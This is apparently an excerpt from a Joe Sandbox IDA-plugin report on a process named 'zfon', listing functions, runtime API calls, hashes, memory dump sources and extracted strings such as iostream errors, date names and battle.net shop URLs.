                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionThrowstd::ios_base::failure::failure
                                                                                                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                • API String ID: 2003779279-1866435925
                                                                                                • Opcode ID: 8de342f0291e80d733e627eaf939c61c9f2c4bc02dc7a8bd2179287c94fe2617
                                                                                                • Instruction ID: 599bdaf7118dbf2e656d2dbcab2e3170590cb20c28047e9c78a5ba2a98ad8eee
                                                                                                • Opcode Fuzzy Hash: 8de342f0291e80d733e627eaf939c61c9f2c4bc02dc7a8bd2179287c94fe2617
                                                                                                • Instruction Fuzzy Hash: 53517E62A08A86D1EF549F1DD4903A86760EB84BD9F548235DB2E837E5DF3CE986C300
                                                                                                APIs
                                                                                                  • Part of subcall function 00007FF8B90E74A0: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90E74B8
                                                                                                  • Part of subcall function 00007FF8B90E74A0: ___mb_cur_max_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90E74C0
                                                                                                  • Part of subcall function 00007FF8B90E74A0: ___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90E74C9
                                                                                                  • Part of subcall function 00007FF8B90E74A0: __pctype_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90E74E5
                                                                                                • localeconv.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B9105723
                                                                                                • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B910575B
                                                                                                • _Getvals.LIBCPMT ref: 00007FF8B9105794
                                                                                                • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF8B910586E
                                                                                                  • Part of subcall function 00007FF8B9116410: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF8B9116419
                                                                                                  • Part of subcall function 00007FF8B9116410: _CxxThrowException.VCRUNTIME140(?,?,?,?,?,?,?,?,00007FF8B912CAF9,?,?,00000000,00007FF8B90EC4D0), ref: 00007FF8B911642A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Concurrency::cancel_current_taskExceptionGetvalsThrow___lc_codepage_func___lc_locale_name_func___mb_cur_max_func__pctype_funccalloclocaleconvstd::bad_alloc::bad_alloc
                                                                                                • String ID: $+xv$$+xv$+v$x+v$xv$+xv+$xv$+x+$vx+$vx$v+x+$vx$+vx+v $+v $v $+v +$v $++$ v+$ v$ v++$ v$+ v+xv$+ v$v$ +v+ $v$ ++x$v+ $v$v ++ $v$ +v
                                                                                                • API String ID: 801482897-3573081731
                                                                                                • Opcode ID: 9c08d5fc2ba6d1f9c895b19a1ef2ef9da669aab50d1ee5f16d3dedc8da72be6f
                                                                                                • Instruction ID: 2b81017a8ce04bc590bbebc2749971fe06f20d7fdc3f357101a72a2c35fdafed
                                                                                                • Opcode Fuzzy Hash: 9c08d5fc2ba6d1f9c895b19a1ef2ef9da669aab50d1ee5f16d3dedc8da72be6f
                                                                                                • Instruction Fuzzy Hash: 8051CE36A08BC186EB24CF2A949047D7BA4FB45BD0B544276CFA9437A5DF3EE485E700
                                                                                                APIs
                                                                                                  • Part of subcall function 00007FF8B90E74A0: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90E74B8
                                                                                                  • Part of subcall function 00007FF8B90E74A0: ___mb_cur_max_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90E74C0
                                                                                                  • Part of subcall function 00007FF8B90E74A0: ___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90E74C9
                                                                                                  • Part of subcall function 00007FF8B90E74A0: __pctype_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90E74E5
                                                                                                • localeconv.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B91058CB
                                                                                                • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B9105903
                                                                                                • _Getvals.LIBCPMT ref: 00007FF8B910593C
                                                                                                • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF8B9105A16
                                                                                                  • Part of subcall function 00007FF8B9116410: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF8B9116419
                                                                                                  • Part of subcall function 00007FF8B9116410: _CxxThrowException.VCRUNTIME140(?,?,?,?,?,?,?,?,00007FF8B912CAF9,?,?,00000000,00007FF8B90EC4D0), ref: 00007FF8B911642A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Concurrency::cancel_current_taskExceptionGetvalsThrow___lc_codepage_func___lc_locale_name_func___mb_cur_max_func__pctype_funccalloclocaleconvstd::bad_alloc::bad_alloc
                                                                                                • String ID: $+xv$$+xv$+v$x+v$xv$+xv+$xv$+x+$vx+$vx$v+x+$vx$+vx+v $+v $v $+v +$v $++$ v+$ v$ v++$ v$+ v+xv$+ v$v$ +v+ $v$ ++x$v+ $v$v ++ $v$ +v
                                                                                                • API String ID: 801482897-3573081731
                                                                                                • Opcode ID: 08f4393cbb9286a77c8465830587d0892ef895849c8ce4b697314d7c6ad679fd
                                                                                                • Instruction ID: 03cda1569cfb5d8950127a11177700921ef50311ae1a07321e4468042d0cbfaf
                                                                                                • Opcode Fuzzy Hash: 08f4393cbb9286a77c8465830587d0892ef895849c8ce4b697314d7c6ad679fd
                                                                                                • Instruction Fuzzy Hash: AD51C132A08BC186E724CF29949056D7BB5FB45BE4B141275CFA9437A4DF3EE445E700
                                                                                                APIs
                                                                                                • LoadLibraryExW.KERNEL32(?,?,?,00007FF8BFAD379F,?,?,00000000,00007FF8BFAD35D0,?,?,?,?,00007FF8BFAD334D), ref: 00007FF8BFAD3665
                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF8BFAD379F,?,?,00000000,00007FF8BFAD35D0,?,?,?,?,00007FF8BFAD334D), ref: 00007FF8BFAD3673
                                                                                                • wcsncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF8BFAD379F,?,?,00000000,00007FF8BFAD35D0,?,?,?,?,00007FF8BFAD334D), ref: 00007FF8BFAD368C
                                                                                                • LoadLibraryExW.KERNEL32(?,?,?,00007FF8BFAD379F,?,?,00000000,00007FF8BFAD35D0,?,?,?,?,00007FF8BFAD334D), ref: 00007FF8BFAD369E
                                                                                                • FreeLibrary.KERNEL32(?,?,?,00007FF8BFAD379F,?,?,00000000,00007FF8BFAD35D0,?,?,?,?,00007FF8BFAD334D), ref: 00007FF8BFAD370C
                                                                                                • GetProcAddress.KERNEL32(?,?,?,00007FF8BFAD379F,?,?,00000000,00007FF8BFAD35D0,?,?,?,?,00007FF8BFAD334D), ref: 00007FF8BFAD3718
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549530455.00007FF8BFAD1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8BFAD0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2549435771.00007FF8BFAD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549570951.00007FF8BFAD5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549677238.00007FF8BFAD8000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549715751.00007FF8BFAD9000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8bfad0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Library$Load$AddressErrorFreeLastProcwcsncmp
                                                                                                • String ID: api-ms-
                                                                                                • API String ID: 916704608-2084034818
                                                                                                • Opcode ID: 8d2fd0d93c7eb14211fa12b3fc953288da202effed1889c61ef573fe6e8128a2
                                                                                                • Instruction ID: 41eb83eb9a6851515688a13f28a1b8bcb92bb2044d5e4c08eaab129c77d63d7a
                                                                                                • Opcode Fuzzy Hash: 8d2fd0d93c7eb14211fa12b3fc953288da202effed1889c61ef573fe6e8128a2
                                                                                                • Instruction Fuzzy Hash: 6731E729B1AB4197FE39AB9AA80217A23A4BF44BE8F496534DF1D073C4DF3CE0558700
                                                                                                APIs
                                                                                                • LoadLibraryExW.KERNEL32(?,?,?,00007FF8BFB571A3,?,?,00000000,00007FF8BFB56FD4,?,?,?,?,00007FF8BFB56D11), ref: 00007FF8BFB57069
                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF8BFB571A3,?,?,00000000,00007FF8BFB56FD4,?,?,?,?,00007FF8BFB56D11), ref: 00007FF8BFB57077
                                                                                                • wcsncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF8BFB571A3,?,?,00000000,00007FF8BFB56FD4,?,?,?,?,00007FF8BFB56D11), ref: 00007FF8BFB57090
                                                                                                • LoadLibraryExW.KERNEL32(?,?,?,00007FF8BFB571A3,?,?,00000000,00007FF8BFB56FD4,?,?,?,?,00007FF8BFB56D11), ref: 00007FF8BFB570A2
                                                                                                • FreeLibrary.KERNEL32(?,?,?,00007FF8BFB571A3,?,?,00000000,00007FF8BFB56FD4,?,?,?,?,00007FF8BFB56D11), ref: 00007FF8BFB57110
                                                                                                • GetProcAddress.KERNEL32(?,?,?,00007FF8BFB571A3,?,?,00000000,00007FF8BFB56FD4,?,?,?,?,00007FF8BFB56D11), ref: 00007FF8BFB5711C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549874919.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2549750292.00007FF8BFB50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549976829.00007FF8BFB63000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2550400824.00007FF8BFB68000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2550885347.00007FF8BFB69000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8bfb50000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Library$Load$AddressErrorFreeLastProcwcsncmp
                                                                                                • String ID: api-ms-
                                                                                                • API String ID: 916704608-2084034818
                                                                                                • Opcode ID: 76e9ed00015fa7378e2762435fe1c6674923b12dca3248f544122840abba5d3b
                                                                                                • Instruction ID: bf360aa0ad272c1e23d9479e674a4266aa366a460bdbea350a4e4091103d3c8f
                                                                                                • Opcode Fuzzy Hash: 76e9ed00015fa7378e2762435fe1c6674923b12dca3248f544122840abba5d3b
                                                                                                • Instruction Fuzzy Hash: 82316122B1A746A1EE119B8A982497573D4BF44BE0F6D4535DF1D87354EF3CF5488300
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Initstd::ios_base::_$AddstdExceptionThrowstd::ios_base::failure::failurestd::locale::_
                                                                                                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                • API String ID: 792165947-1866435925
                                                                                                • Opcode ID: 5a961f8f7a396de3a89a0a91937ff84da1abf775fff624eb7f976a44ec027974
                                                                                                • Instruction ID: 88763665f41e69cc2083e789d53815700020881681ab896e0bd8e6b09b439e4e
                                                                                                • Opcode Fuzzy Hash: 5a961f8f7a396de3a89a0a91937ff84da1abf775fff624eb7f976a44ec027974
                                                                                                • Instruction Fuzzy Hash: D0218F62A18ACA92EE149F2DE5513A967A0FB547C0F444031E75D47B96DF3CE5A2C700
                                                                                                APIs
                                                                                                  • Part of subcall function 00007FF8B90E74A0: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90E74B8
                                                                                                  • Part of subcall function 00007FF8B90E74A0: ___mb_cur_max_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90E74C0
                                                                                                  • Part of subcall function 00007FF8B90E74A0: ___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90E74C9
                                                                                                  • Part of subcall function 00007FF8B90E74A0: __pctype_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90E74E5
                                                                                                • _W_Getdays.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FF8B90FC3EE
                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B90FC40B
                                                                                                • _W_Getmonths.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FF8B90FC42B
                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B90FC448
                                                                                                  • Part of subcall function 00007FF8B90EB710: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF8B90FC445), ref: 00007FF8B90EB739
                                                                                                  • Part of subcall function 00007FF8B90EB710: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF8B90FC445), ref: 00007FF8B90EB768
                                                                                                  • Part of subcall function 00007FF8B90EB710: memcpy.VCRUNTIME140(?,?,00000000,00007FF8B90FC445), ref: 00007FF8B90EB77F
                                                                                                Strings
                                                                                                • :Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:Dece, xrefs: 00007FF8B90FC453
                                                                                                • :AM:am:PM:pm, xrefs: 00007FF8B90FC464
                                                                                                • :Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday, xrefs: 00007FF8B90FC416
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: free$GetdaysGetmonths___lc_codepage_func___lc_locale_name_func___mb_cur_max_func__pctype_funcmallocmemcpy
                                                                                                • String ID: :AM:am:PM:pm$:Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:Dece$:Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday
                                                                                                • API String ID: 1539549574-3743323925
                                                                                                • Opcode ID: 29a469ce97e9e63c9afcb1297cf3119d81ee8217b80f69d292bc9982e8b506e4
                                                                                                • Instruction ID: 78c883a46133b3683f84ee6de1d9038153cb75860549176344bcac5842e62229
                                                                                                • Opcode Fuzzy Hash: 29a469ce97e9e63c9afcb1297cf3119d81ee8217b80f69d292bc9982e8b506e4
                                                                                                • Instruction Fuzzy Hash: BD212722A08B8282EB10DF29E45426973B0FB88BD4F444274DB8E43A66EF3CE585C740
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: memmove$freemallocmemcpy
                                                                                                • String ID: https://www.battle.net/shop/simplecheckout/debug-harness$https://www.battle.net/shop/simplecheckout/error$https://www.battle.net/shop/simplecheckout/loading$https://www.battle.net/shop/simplecheckout/navbar
                                                                                                • API String ID: 343939323-4034954138
                                                                                                • Opcode ID: 763b38a5e1ba8311d891531e55b4489e58e1bc519419c3cf1bddc3e57f5fc990
                                                                                                • Instruction ID: 2510ebb56a4e04fc1ecdcd6eacf9e2697c663b16e4ddbbdf1632304ded0b8dc8
                                                                                                • Opcode Fuzzy Hash: 763b38a5e1ba8311d891531e55b4489e58e1bc519419c3cf1bddc3e57f5fc990
                                                                                                • Instruction Fuzzy Hash: E9020B32915F81D5D705DF24E9802A8B7B4FB48B58F948236CB9C17369EF39E1A5C3A0
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549874919.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2549750292.00007FF8BFB50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549976829.00007FF8BFB63000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2550400824.00007FF8BFB68000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2550885347.00007FF8BFB69000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8bfb50000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: abort$AdjustPointer
                                                                                                • String ID:
                                                                                                • API String ID: 1501936508-0
                                                                                                • Opcode ID: 77d40a3a750292ef56bb7ba82bc0b9b507dfb24b3446034ca75943c21c5ab11f
                                                                                                • Instruction ID: 2bcc333089077b3c5d1ee774baa394e26de48f32f5c82043c177ef2822a7074d
                                                                                                • Opcode Fuzzy Hash: 77d40a3a750292ef56bb7ba82bc0b9b507dfb24b3446034ca75943c21c5ab11f
                                                                                                • Instruction Fuzzy Hash: 5A518C62B0BA8291FE6A9B9D9464639B3A4AF54FD4B094435CF4E06FD5DF2CF442C310
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549874919.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2549750292.00007FF8BFB50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549976829.00007FF8BFB63000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2550400824.00007FF8BFB68000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2550885347.00007FF8BFB69000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8bfb50000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: abort$AdjustPointer
                                                                                                • String ID:
                                                                                                • API String ID: 1501936508-0
                                                                                                • Opcode ID: f0706fa7c64a0a7492f233c4046144e15a2d0b25a5c3bc49f148db7cf339c299
                                                                                                • Instruction ID: 4cc35fd8fb4c413f5979b89f25cc66f93a3c3a01a8cbdb50752341717d083576
                                                                                                • Opcode Fuzzy Hash: f0706fa7c64a0a7492f233c4046144e15a2d0b25a5c3bc49f148db7cf339c299
                                                                                                • Instruction Fuzzy Hash: FA517222A0B79291FE659B9DA4A46387394AF54FD4F094439DF4E06B95DF3CF441C310
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: CurrentThread$Xtime_diff_to_millis2xtime_get
                                                                                                • String ID:
                                                                                                • API String ID: 3218647749-0
                                                                                                • Opcode ID: 6f3bf3e151121cb8b9efbec79e646c9e8da7cfbfd622af188c552a0e09985615
                                                                                                • Instruction ID: 9a6242b8a0aa872aa357afe41220b86a7cbddce50b873fe452de3b66d6fec96a
                                                                                                • Opcode Fuzzy Hash: 6f3bf3e151121cb8b9efbec79e646c9e8da7cfbfd622af188c552a0e09985615
                                                                                                • Instruction Fuzzy Hash: 45410D32D08686D6EE649F1EE49077973B0EB447C4F508031DB5E426A1DF3DE98AD701
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: cef_string_map_alloc
                                                                                                • String ID:
                                                                                                • API String ID: 3041573648-0
                                                                                                • Opcode ID: 7bf056c13a2da99b91ea4627273c8a9152c289f73d6bb08a8926818adde8cdeb
                                                                                                • Instruction ID: eada031b1c74ac757cbd0e1234499a6ef508f79975fcca7f2da93a4351c4f1f5
                                                                                                • Opcode Fuzzy Hash: 7bf056c13a2da99b91ea4627273c8a9152c289f73d6bb08a8926818adde8cdeb
                                                                                                • Instruction Fuzzy Hash: 45F00712A1C68990E7D4FF30CC521F95720AF68B44FC40931E62D450EB9F14D956C3B1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmpDownload File
